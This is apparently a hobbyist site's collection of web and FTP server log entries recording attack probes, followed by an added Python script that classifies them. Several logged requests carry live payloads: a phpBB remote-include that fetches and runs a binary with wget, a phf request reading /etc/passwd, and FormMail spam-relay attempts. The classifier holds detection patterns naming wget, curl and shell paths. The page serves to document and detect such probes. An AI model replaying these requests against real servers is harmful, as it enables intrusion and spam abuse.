I&U Home > うにまま(仮) · Mystery Log Companion · Password Collection · FormMail Scanners
[all] [apache] exploit [ftp] [robot] [webalizer] [SEO_SPAM] [others]
[exploit] Accesses probing for Mambo Server vulnerabilities
[exploit] phpMyAdmin
[exploit] ELF_KAIGENT.C
[exploit] Probably just a coincidence, but...
[exploit] First time I've seen this one: mkd _K4e
[exploit] A curious combination
[exploit] Scan script
[exploit] "GET /NULL.printer"
[exploit] Tunneling attempt
[exploit] "GET /scripts/nsiislog.dll" - attack targeting the MS03-019 vulnerability
[exploit] Scan by Nikto/1.30
[exploit] Probing for PHP scripts
[exploit] "GET /cfdocs/expeval/ExprCalc.cfm" - attack targeting a ColdFusion sample script
[exploit] Attacks targeting mail-sending scripts
[exploit] "SEARCH / HTTP/1.1"
[exploit] Password-list attack
[exploit] Persistent scanning
[exploit] ano@ano.com
[exploit] msadcs.dll
[exploit] Pub Maker
[exploit] ano@ano.com
[exploit] The clingy one
[exploit] @here.com
[exploit] sss@
[exploit] This time it's mailto.exe
[exploit] ano ano com
[exploit] formmail again
[exploit] Referer forgery
[exploit] Footprints of SuperScan
[exploit] FrontPage 2000 vulnerability
[exploit] We do not offer a proxy service
[exploit] While I was away for Obon... attack #2
[exploit] While I was away for Obon... attack #1
[exploit] formmail follow-up
[exploit] formmail.pl/formmail.cgi apparently has a security hole
[exploit] anonymous@ftp.microsoft.com follow-up
[exploit] Relay (stepping-stone) attack?
[exploit] Be careful
Mystery log index
Name: 69-56-146-210.theplanet.com
Address: 69.56.146.210
83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:37:12 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"
221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.25.90.15 - - [20/Feb/2006:03:24:32 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Nov 17 11:43:15 myhost ftpd[25380]: FTPD: connection from defense-4-81-57-92-161.fbx.proxa at Mon Nov 17 11:43:15 2003
Nov 17 11:43:15 myhost ftpd[25380]: <--- 220
Oct 8 23:57:25 myhost ftpd[12560]: FTPD: connection from pD9E40E3F.dip.t-dialin.net at Wed Oct 8 23:57:25 2003
Oct 8 23:57:25 myhost ftpd[12560]: <--- 220
210.51.181.114 - - [06/Sep/2003:16:12:55 +0900] "\x04\x01" 501 - "-" "-"
210.51.181.114 - - [06/Sep/2003:16:13:15 +0900] "\x05\x01" 501 - "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
24.123.170.99 - - [08/Aug/2003:07:27:47 +0900] "GET /NULL.printer" 404 - "-" "-"
12.218.107.176 - - [04/Aug/2003:18:28:57 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
12.218.107.176 - - [04/Aug/2003:18:28:59 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
211.181.212.10 - - [16/Jul/2003:08:56:32 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
80.139.104.127 - - [21/Jul/2003:10:47:04 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
212.92.77.254 - - [24/Jul/2003:01:31:16 +0900] "GET / HTTP/1.1" 200 3923 "-" "libwhisker/1.6"
212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )"
217.162.194.164 - - [17/Jul/2003:21:42:02 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
217.162.194.164 - - [17/Jul/2003:21:42:05 +0900] "GET /index.php HTTP/1.0" 404 281 "-" "-"
212.202.40.10 - - [26/Jun/2003:07:10:26 +0900] "GET /cfdocs/expeval/ExprCalc.cfm HTTP/1.0" 404 299 "-" "-"
211.233.27.208 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.cgi HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
192.148.139.178 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.asp HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
203.15.69.139 - - [24/Jun/2003:07:17:12 +0900] "SEARCH / HTTP/1.1" 501 344 "-" "-"
Jun 22 09:44:47 myhost ftpd[24002]: FTPD: connection from APlessis-Bouchard-101-2-1-53.w19 at Sun Jun 22 09:44:47 2003
Jun 22 09:44:47 myhost ftpd[24002]: <--- 220
217.227.77.239 - - [30/Mar/2003:00:11:55 +0900] "HEAD / HTTP/1.0" 200 0 "-" "-"
217.227.77.239 - - [30/Mar/2003:00:11:56 +0900] "GET /.pl HTTP/1.0" 404 275 "-" "-"
208.203.70.195 - - [08/Nov/2002:10:56:37 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"
208.203.70.195 - - [08/Nov/2002:10:56:38 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"
Nov 10 14:05:20 myhost ftpd[22995]: FTPD: connection from pc-outside.uni-greifswald.de at Sun Nov 10 14:05:20 2002
Nov 10 14:05:20 myhost ftpd[22995]: <--- 220
The clingy one spotted → log
Oct 25 03:22:54 myhost ftpd[24850]: FTPD: connection from ca-bordeaux-13-232.abo.wanadoo.f at Fri Oct 25 03:22:54 2002
Oct 25 03:22:54 myhost ftpd[24850]: <--- 220
Oct 10 23:51:59 myhost ftpd[2723]: FTPD: connection from 213.226.134.110 at Thu Oct 10 23:51:59 2002
Oct 10 23:51:59 myhost ftpd[2723]: <--- 220
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /scripts/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/scripts/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /cgi-bin/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/cgi-bin/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Sep 19 02:15:35 myhost ftpd[2300]: FTPD: connection from pD951ED19.dip.t-dialin.net at Thu Sep 19 02:15:35 2002
80.3.64.5 - - [19/Sep/2002:06:54:41 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.0" 404 0 "http://mydomain/" "-"
80.3.64.5 - - [19/Sep/2002:06:54:42 +0900] "HEAD /cgi-bin/formmail.cgi HTTP/1.1" 404 0 "http://mydomain/" "-"
209.142.168.7 - - [11/Sep/2002:08:22:25 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 "http://gib.genes.nig.ac.jp/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
209.142.168.7 - - [11/Sep/2002:08:22:29 +0900] "GET / HTTP/1.0" 200 3906 "http://mydomain/cgi-bin/formmail.pl" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
Sep 6 06:05:46 myhost ftpd[22667]: FTPD: connection from 217.172.194.74 at Fri Sep 6 06:05:46 2002
Sep 6 06:05:46 myhost ftpd[22667]: <--- 220
It's long, so I've wrapped it at a convenient point, but
158.252.215.43 - - [21/Aug/2002:00:34:24 +0900] "CONNECT mx2.mail.yahoo.com:25 HTTP/1.0" 405 309
213.37.58.178 - - [21/Aug/2002:15:35:52 +0900] "GET http://mytest.maddock.net/cgi-bin/myinfo HTTP/1.1" 404 298
This one, however, was quite persistent: 31 connections between the 14th and the 17th.
First with IE, then probably by hand, and then SmartFTP.
Searching on the characteristics of this FTP scan (AFS.TXT and sss@servxxa.com),
64.48.129.24 - - [15/Jul/2002:08:03:15 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291
64.48.129.24 - - [15/Jul/2002:08:03:19 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 292
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.pl?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.pl&body=JupZ&email=srt@aol.com HTTP/1.1" 404 300
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.cgi?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.cgi&body=JupZ&email=mim@aol.com HTTP/1.1" 404 301
While checking the ftpd logs I noticed that the anonymous@ftp.microsoft.com log entries and the ○gpuser attack (my own name for it) seem to be related.
Mar 10 06:23:37 myhost ftpd[3735]: FTPD: connection from modemcable091.124-202-24.mtl.mc. at Sun Mar 10 06:23:37 2002
Mar 10 06:23:37 myhost ftpd[3735]: <--- 220
"GET /phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 274
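The excerpts above fall into a handful of probe families: spam relaying through FormMail-style scripts, open-proxy checks (HTTP CONNECT to port 25, absolute URIs, raw SOCKS handshakes logged as \x04\x01 and \x05\x01), a PHP remote-file-include with a shell command chain appended, WebDAV SEARCH, and requests for old IIS/ColdFusion exploit paths. As an added example that is not part of this page or any tool it mentions, here is a small Python classifier that tags access-log lines of those kinds. The sample lines are copied from the excerpts above; the tag names, regexes and path lists are my own choices.

```python
"""Tag the probe types seen in the log excerpts above (added example)."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache "combined" format. Referer and User-Agent are optional because some
# excerpts on the page were trimmed after the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Apache logs unprintable request bytes as \xNN. A SOCKS4 CONNECT starts with
# 0x04 0x01; a SOCKS5 greeting offering one auth method starts with 0x05 0x01.
SOCKS_PREFIXES = ("\\x04\\x01", "\\x05\\x01")

# Mail-sending scripts the page shows being hit for spam relaying.
MAIL_RELAY_SCRIPTS = {"formmail.pl", "formmail.cgi", "mailto.exe", "sendmail.cgi", "sendmail.asp"}

# Paths of old, well-known server-side bugs that appear in the excerpts:
# nsiislog.dll (MS03-019), msadcs.dll (MDAC RDS), .printer (IIS 5 ISAPI),
# ExprCalc.cfm (ColdFusion sample script) and phf.
LEGACY_EXPLOIT_SUFFIXES = ("/nsiislog.dll", "/msadcs.dll", ".printer", "/exprcalc.cfm", "/phf")

# Shell metacharacter followed by a downloader/chdir/interpreter, or a direct /bin/ path.
SHELL_RE = re.compile(r"[;|\n]\s*(?:wget|curl|cd|chmod|sh|perl)\b|/bin/(?:sh|cat)\b")
# A path/root/include-style parameter pointing at a remote URL (PHP remote file include).
RFI_RE = re.compile(r"[?&]\w*(?:path|dir|root|inc|file|page)\w*=https?://", re.IGNORECASE)
SCANNER_UA_RE = re.compile(r"nikto|libwhisker|nessus", re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into fields; return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["req"].split(" ")
    # "GET /x HTTP/1.0" -> method + target; a lone "\x04\x01" has no method.
    rec["method"] = parts[0] if len(parts) >= 2 else ""
    rec["target"] = parts[1] if len(parts) >= 2 else parts[0]
    # %NN decoding exposes "cd /tmp;wget ..." hidden behind %20.
    rec["decoded"] = unquote(rec["target"])
    return rec


def classify(rec):
    """Return the list of probe tags that apply to a parsed line (empty if benign)."""
    tags = []
    path = rec["decoded"].split("?", 1)[0].lower()
    if rec["req"].startswith(SOCKS_PREFIXES):
        tags.append("socks-probe")
    if rec["method"] == "CONNECT":
        tags.append("proxy-connect")          # open-proxy check, typically toward port 25
    if rec["target"].lower().startswith(("http://", "https://")):
        tags.append("proxy-absolute-uri")     # absolute URI = "please forward this for me"
    if rec["method"] == "SEARCH":
        tags.append("webdav-search")
    if SHELL_RE.search(rec["decoded"]):
        tags.append("command-injection")
    if RFI_RE.search(rec["decoded"]):
        tags.append("remote-file-include")
    if path.rsplit("/", 1)[-1] in MAIL_RELAY_SCRIPTS:
        tags.append("mail-relay-script")
    if "phpmyadmin" in path:
        tags.append("phpmyadmin-probe")
    if path.endswith(LEGACY_EXPLOIT_SUFFIXES):
        tags.append("legacy-exploit-path")
    if SCANNER_UA_RE.search(rec.get("ua") or ""):
        tags.append("scanner-ua")
    return tags


def summarize(log_text):
    """Map each source IP to a Counter of tags; lines with no tags are dropped."""
    by_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec):
            by_ip[rec["ip"]][tag] += 1
    return by_ip


# Lines copied from the excerpts on this page (two of them were trimmed there).
SAMPLE_LOG = r'''
83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.51.181.114 - - [06/Sep/2003:16:12:55 +0900] "\x04\x01" 501 - "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
12.218.107.176 - - [04/Aug/2003:18:28:57 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
211.181.212.10 - - [16/Jul/2003:08:56:32 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )"
203.15.69.139 - - [24/Jun/2003:07:17:12 +0900] "SEARCH / HTTP/1.1" 501 344 "-" "-"
213.37.58.178 - - [21/Aug/2002:15:35:52 +0900] "GET http://mytest.maddock.net/cgi-bin/myinfo HTTP/1.1" 404 298
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.pl?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.pl&body=JupZ&email=srt@aol.com HTTP/1.1" 404 300
'''

if __name__ == "__main__":
    for ip, tags in summarize(SAMPLE_LOG).items():
        print(ip, dict(tags))
```

The classifier works on the request after %-decoding but leaves Apache's own \xNN escapes alone, since that is exactly how the SOCKS handshakes show up in the file. The RFI rule only fires on parameter names that look like a path or include setting, so the `subject=http://...` that the formmail probes send (a reflection of the URL they hit, not an include) is not mistaken for one; the phpBB line still matches on both `phpbb_root_path=http://` and the `;wget` chain that follows it. Every 404 in the samples is a miss, but the same source hitting several of these tags in a row is what the page's "persistent" entries are about, and the per-IP summary is the first thing to look at.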